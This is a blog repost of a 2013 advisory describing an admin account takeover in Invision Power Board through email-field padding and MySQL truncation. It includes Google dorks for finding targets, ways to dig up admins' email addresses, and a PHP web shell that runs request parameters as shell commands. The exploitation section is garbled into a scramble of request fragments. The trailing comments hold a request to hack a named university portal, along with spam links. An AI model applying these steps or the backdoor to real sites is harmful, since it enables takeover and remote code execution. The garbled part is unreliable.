IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) - Admin Account Takeover
http://kingofdkingz99.blogspot.com/2013/05/ipb-invision-power-board-all-versions.html
IPB (Invision Power Board) all versions (1.x? / 2.x / 3.x) Admin account Takeover leading to code execution
Written on : 2013/05/02 Released on : 2013/05/13 Author: John JEAN (@johnjean on twitter) Affected application: Invision Power Board <= 3.4.4 Type of vulnerability: Logical Vulnerability / Bad Sanitization Required informations : Administrator's email Evaluated Risk : Critical Solution Status : A patch has been released which fixes these vulnerabilities References : http://www.john-jean.com/blog/securite-informatique/ipb-invision-power-board-all-versions-1-x-2-x-3-x-admin-account-takeover-leading-to-code-execution-742 [0] Application description & Deployment estimation From wikipedia.org: Invision Power Board (abbreviated IPB, IP.Board or IP Board) is an Internet forum software produced by Invision Power Services, Inc. It is written in PHP and primarily uses MySQL as a database management system, although support for other database engines is available. While Invision Power Board is a commercially sold product, there is a large modding community and many of these modifications are free. In addition, many groups offer the download or design of free and paid skins. ---- This software is deployed on very popular websites such as: NASA, EMI, NHL, NBC, O'Reilly, Evernote, ... You can easily find tens of thousands of deployed instances using Google dorks such as: "inurl:index.php?app=core" or "powered by Invision Power Board". [I] Logic Flaw A) Overview IPB harbors a sanitization flaw in its registration form and user control panel (accessible once logged in). Incorrect e-mail address validation code allows an attacker to take over the admin account without prompting any alert but preventing the real admin to login afterwards. After a successful takeover, the attacker can plant a PHP backdoor using IPB's templating system. Thorough administrators will inspect total file system after they recover their hacked account, while other administrators might assume they are dealing with a bug, receive their new password using "Password recovery" system and leave the backdoor intact. Attacker may also use the "Retrieve password" process to mislead the admin into thinking their account was locked due to unsuccessful login attempts and not investigating further, thus preserving the backdoor. B) Required data 1) Administrator's login name The admin login is easily found by clicking on "The moderating Team" link on recent IPB's footer, or using the URL below: index.php?app=forums&module=extras§ion=stats&do=leaders 2) Administrator's e-mail Obtaining the admin e-mail may be more complicated as there is no automated way to get it. The attacker can get it through: - using whois on domain.tld to get registrar informations - looking up a prospective e-mail on Facebook and see if a matching profile shows up - using Gravatar (Gravatar is a personal avatar you can find on most blogs, forum, etc comments based on user e-mail address). Attacker can create a script to retrieve an email based on an avatar. For example mine is: http://www.john-jean.com/gravapwnd.php?zboob=john@wargan.com - do sourcing using FB, G+, Twitter, Google SERP, ... - use SE methods, such as faked e-mail catcher; or use XSSs on known websites consulted by the target. C) Explanation This vulnerability is grounded on both a mistake in MySQL knowledge and bad sanitization of the $email variable. 1) First of all, let's summarize how MySQL works: - Truncating while INSERT During an INSERT query, if the string exceeds the field size defined when creating the table, the string will be truncated. E.g.: ************************ BEGIN OF CODE ************************ CREATE TABLE `test` ( `limitvarchar` varchar(5) NOT NULL ); --- INSERT INTO `test` (`limitvarchar`) VALUES ('123456789'); --- SELECT * FROM `test` > 12345 ************************* END OF CODE *************************** However, the string is not truncated during SELECT queries. The following query will not return any result: ************************ BEGIN OF CODE ************************ SELECT * FROM `test` WHERE `limitvarchar` = "123456" ************************* END OF CODE *************************** MySQL use permissive SELECT: SELECT ignores spaces at the end of strings. Let's INSERT some datas: ************************ BEGIN OF CODE ************************ INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 '); INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 '); INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 '); INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1 '); INSERT INTO `divers`.`test` (`limitvarchar`) VALUES ('1'); ************************* END OF CODE *************************** Thus the following query will yield the 5 records inserted before: ************************ BEGIN OF CODE ************************ SELECT * FROM `test` WHERE limitvarchar='1 ' ************************* END OF CODE *************************** Now, let's have a look at the checkEmailAddress function of admin/source/base/core.php: ************************ BEGIN OF CODE ************************ /** * Check email address to see if it seems valid * * @param string Email address * @return boolean * @since 2.0 */ static public function checkEmailAddress( $email = "" ) { $email = trim($email); $email = str_replace( " ", "", $email ); //----------------------------------------- // Check for more than 1 @ symbol //----------------------------------------- if ( substr_count( $email, '@' ) > 1 ) { return FALSE; } if ( preg_match( '#[\;\#\n\r\*\'\"<>&\%\!\(\)\{\}\[\]\?\\/\s\,]#', $email ) ) { return FALSE; } /* tld increased to 32 characters as per RFC - http://community.invisionpower.com/resources/bugs.html/_/ip-board/ipstextcheckemailaddress-does-not-match-new-2013-tlds-r41518*/ else if ( preg_match( '/^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,32}|[0-9]{1,4})(\]?)$/', $email) ) { return TRUE; } else { return FALSE; } } ************************* END OF CODE *************************** As you may know, trim only removes whitespace (and some others) characters BEFORE and AFTER the string, that is why IPB core team also use str_replace to remove space chars IN the email string. However, this treatment is performed to change the email address to the correct format. This is done to ensure the next steps of the check, but there will be no condition returning false if string has been trim or if str_replace has been used. This function checks an email validity format used in the register form and the change email form. Let's take a look at a another function called load( $member_key, $extra_tables='all', $key_type='' ) in admin/sources/base/ipsMember.php ************************ BEGIN OF CODE ************************ static public function load( $member_key, $extra_tables='all', $key_type='' ) { //----------------------------------------- // INIT //----------------------------------------- $member_value = 0; $members = array(); $multiple_ids = array(); $member_field = ''; $joins = array(); $tables = array( 'pfields_content' => 0, 'profile_portal' => 0, 'groups' => 0, 'sessions' => 0, 'members_partial' => 0 ); $remap = array( 'extendedProfile' => 'profile_portal', 'customFields' => 'pfields_content'); //----------------------------------------- // ID or email? //----------------------------------------- if ( ! $key_type ) { if ( is_array( $member_key ) ) { $multiple_ids = array_map( 'intval', $member_key ); // Bug #20908 $member_field = 'member_id'; } else { if ( strstr( $member_key, '@' ) ) { $member_value = "'" . ipsRegistry::DB()->addSlashes( strtolower( $member_key ) ) . "'"; $member_field = 'email'; } else { $member_value = intval( $member_key ); $member_field = 'member_id'; } } } [...] case 'email': if ( is_array( $member_key ) ) { array_walk( $member_key, create_function( '&$v,$k', '$v="\'".ipsRegistry::DB()->addSlashes( strtolower( $v ) ) . "\'";' ) ); $multiple_ids = $member_key; } else { $member_value = "'" . ipsRegistry::DB()->addSlashes( strtolower( $member_key ) ) . "'"; } $member_field = 'email'; ************************* END OF CODE *************************** As you can see, this function does not perform any verification on the length of $member_key & $v. We will exploit that in the next part. D) Exploitation Previously, on this adviso: we saw that $email is not rejected if it contains spurious whitespace, and that $member_key & $v length is not checked. We also saw some MySQL use-cases. Let's see how we can exploit that: The e-mail field from the `members` table in IPB is declared as a varchar(150). Upon registration, we fill the mail member (or admin) for which we want to steal the account to which we add a padding space for the size of the string exceeds 150. Then we add any character after the space one. It is necessary to bypass ajax's validator, feel free to use Burp Suite or Tamperdata. For example: Real administrator's email: 'admin@admin.com' Attacker's mail fill: 'admin@admin.com AAAA' <- 150="" 466="" a="" aaaa="" accept-encoding:="" accept-language:="" accept:="" access="" account.="" account="" actually="" add="" address="" addresses:="" admin.com="" admin="" administrator="" adsess="000&app=core&module=templates§ion=templates&do=list&setID=1" all="" already="" amp="" amstrad="" and="" any="" app="core&module=usercp&tab=core&area=email)." application="" are="" arganos="" as="" assword="pentest&PassWord_Check=pentest&recaptcha_challenge_field=03AHJ_VuvGN728OMAVD0UvgLdylK1KAt8WH0N2aezZZpZfluTG8wJmfSyhiKM0zYb7io5sk62SQ9fQ2Y1XKqPOmEG0hW9DrThpXgEh-DU73qdpZ_OPxkO_v1xg2k1dJSOCk0wZcxufezfezefezFM0LSCwjJn7bbJJMk&recaptcha_response_field=mmotlyiinducted&agree_tos=1" at="" attacker="" backdooring="" backend="" be="" been="" begin="" below:="" both="" by="" can="" change="" changed="" characters="" checking="" code="" codereview="" connection:="" consideration.="" content-length:="" content-type:="" control="" cookie:="" coppa="0;" corresponding="" created.="" defaultheader="" deflate="" deleted="" do="" e-mail="" e-mails="" e="" email="admin@admin.com AAAA" end="" ends="" exceeding="" existing="" first="" flaw="" fr-fr="" fr="" from="" gfx.wargan.com="" gfy.wargan.com="" go="" got="" gzip="" has="" have="" he="" here="" host:="" html="" http:="" http="" in="" index.php="" ipsconnect_0000000000="1;" is:="" is="" keep-alive="" like="" looks="" matching="" member_id="2;" members="" mysql:="" needs="" new="" not="" now="" of="" on="" once="" our="" page="" panel="" pass_hash="000000000000;" password.="" password="" php="" post="" profile.="" profile="" q="0.8,en-us;q=0.5,en;q=0.3" query="" real="" referer:="" registration="" request="" result:="" return="" rtestatus="rte" rv:1.0="" s="" select="" session="" session_id="00000000000;" similar="" some="" spaces="" stage="" stated="" string="" successfully="" taken="" template:="" termsread="1&agree_to_terms=1&do=process_form&coppa_user=0&nexus_pass=1&time_offset=1&dst=1&members_display_name=pentest&EmailAddress=pentest%40wargan.com" text="" the="" this="" thus="" to="" truncated.="" two="" usable="" used.="" user-agent:="" user="" users="" using="" very="" wargan="" we="" where="" will="" with="" x-www-form-urlencoded="" xhtml="" xml="" yield=""> if(isset($_REQUEST['pwnd'])) { $pwnd=$_REQUEST['pwnd']; echo `$pwnd`; } ->
admin how can i get the vulnerability of my university portal?
ReplyDeletehere are the subdomain of my university portal
http://admin.noun.edu.ng/
http://www.noun.edu.ng/
Ipb (Invision Power Board) All Versions (1.X? / 2.X / 3.X) - Admin Account Takeover >>>>> Download Now
Delete>>>>> Download Full
Ipb (Invision Power Board) All Versions (1.X? / 2.X / 3.X) - Admin Account Takeover >>>>> Download LINK
>>>>> Download Now
Ipb (Invision Power Board) All Versions (1.X? / 2.X / 3.X) - Admin Account Takeover >>>>> Download Full
>>>>> Download LINK Ix
In order to apply for registration as a patent agent, one has to be a citizen of India, above the age of 21, and should have a Bachelor’s degree in Science or Engineering from a recognized Indian University or possesses such other equivalent qualifications as the Central Government may specify in this behalf.
ReplyDeleteRegistered patent attorney India | Intellectual Property Law Firm India | "http://www.origiin.com/">Trademark search and registration
Thanks for providing your blog information to us. It will more helpful to students and research fellows who are in serious approach on exams and interviews.
ReplyDeleteWP land - $5/month WordPress hosting.
ReplyDelete